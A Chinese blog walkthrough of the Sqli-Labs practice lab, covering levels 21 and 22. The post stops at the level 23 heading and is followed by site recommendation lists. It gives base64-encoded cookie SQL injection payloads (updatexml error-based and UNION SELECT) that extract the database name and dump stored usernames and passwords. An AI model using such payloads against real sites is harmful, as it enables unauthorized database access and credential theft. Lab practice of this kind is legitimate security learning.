Sqli-Labs 20-38关详解

已于 2022-09-25 21:36:57 修改
阅读量141 收藏
点赞数
文章标签: 安全
于 2022-06-25 10:53:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kindyyy/article/details/125303944
版权

小白写的,肯定有很多错误,一定要多指正!

LESS-21

页面是一个登录窗口

先用弱口令登录试一试 :

admin
123

cookies上面的uname被base64加密过,猜测我们的注入命令也需要用base64加密之后才能正常的运行。这里和前面一样,我们用hackbar注入会方便,但是可能因为有bug,所以注入之后要刷新才能看出来。

先用单引号注入试一试(用base64加密):

有回显 ,说明存在sql注入,但是要将命令用base64加密才能正常进行。查询数据库名:

uname=YWRtaW4gYW5kICcgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgnficsKHNlbGVjdCBkYXRhYmFzZSgpKSksMSkgYW5kICcxJz0nMQ==

 我们知道了数据库名称是security。其实这里可以用普通的注入命令,只要换成base64编码就行。既然如此我们就直接查询最后的数据库内容:

uname=LWFkbWluJykgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQoaWQscGFzc3dvcmQsdXNlcm5hbWUpIGZyb20gc2VjdXJpdHkudXNlcnMgIw==

 注入成功。

LESS-22

用一样的方式弱口令登入进去:

admin&123 

 登陆成功后,发现依然是在cookies处进行注入

测试之后,发现是双引号类型的注入。

 那就直接修改一下命令:

uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwgKDEsY29uY2F0KDB4NWMsKHNlbGVjdCBncm91cF9jb25jYXQodXNlcm5hbWUscGFzc3dvcmQpIGZyb20gdXNlcnMpLDB4NWMpLDEpIw==

 over

LESS-23

kindyyy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-lab 11-20
qq_48413575的博客
01-11 2225
sqli-lab 11-20
sqli-lubs全20(图文)
rui__rui__的博客
01-18 4773
SQLI-LABS注入前20(学自B站crow大佬)
(手工)【sqli-labs20】cookie注入:原理、利用过程
07-10 933
SQL-cookie注入】
sqli-labs第二十详解
金 帛的博客
05-07 1923
sql靶场第二十详解,DNSlog注入
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
sqli-labs 11-20
sy15890481860的博客
02-09 638
sqli-labs 11-20 Less-11: 从这一开始就进入了post的世界 进入页面 随便输入出现报错信息 我们在输入框输入万能密码尝试一下admin'or'=1'#,密码随意。返回正确的结果。 详情看上篇文章 Less-12: 闭合方式") Less-13: 闭合方式**’)**。这里可以用下布尔类型的盲注。猜数据库的第一位,然后挨着对每一位进行测试。 Less-14: 双引号闭...
sqli-lab学习笔记(学习笔记)(11-20
大方子
08-09 2460
接下来的卡是post的注入,之前的都是GET型注入   所以需要准备这个: firfox+hackbar(firfox的插件)   自己常犯得错:   1.第15length(database())我会下意识的加上select 变成length(select database()) 2.用变形双注入里面前面是用or连接,不是用union连接 3.17的update(1,co...
sqli-lab学习笔记(学习笔记)(21-30)
大方子
08-21 5842
  打完21-30之后的后记:   后来发现,网上所有就是讲解sqli的,到后面都没有用查有多少字段数的order by这个语句,几乎都没有提到过,我自己也尝试在后面的变形中加入加入进去但是不知道为什么老是出错,现在我想到的办法就是   比如28a   语句是这样的 http://10.10.10.141/sql/Less-28a/?id=0')UNion%a0SElect%a...
当黑客就入门 SQLi-Labs 1-20 详细攻略
Tuye的博客
07-15 1199
SQLi-Lab 攻略13123
sqli-labs————less 20
Fly_鹏程万里
05-12 1623
Less-20这里做一个简单的测试:username:adminpassword:aaa从上面的显示结果中,我们看到了user-agent、COOKIE的内容,我们这里查看一下源代码看看,到底是怎么回事:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD...
SQL注入:sqli-labs 20 Cookie注入
Zeker62的博客
08-12 351
使用前面卡知道的账号密码:Dumb和Dumb进入 再进入的同时抓个包,发送到repeater模块 发现这个包有cookie,依据题目的题目明白这是个cookie注入: 加个单引号,报错; 报错信息我们知道这是个字符型注入,那剩下就简单多了 判断回显点 注意:Cookie语句中的注释是# ...
SQLI-LAB  的 实战记录(Less 11 - Less 20)
这块盾牌有待改良
07-15 4308
Less - 11 Error Based- String Less - 12 Error Based- Double quotes- String Less - 13 Double Injection- String- with twist
sqli-labs靶场第二十
gou1791241251的博客
12-30 1161
根据提示,二十是cookie注入。我们输入单引号和双引号进行测试 发现它报错了,说明应该是单引号闭合的 尝试一下构建报错注入。 此处的报错信息中查询到了数据库版本,同理可以查询所有库,所有表名,所有字段名等信息。 ...
sqli-labs实验指导手册
最新发布
11-17
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值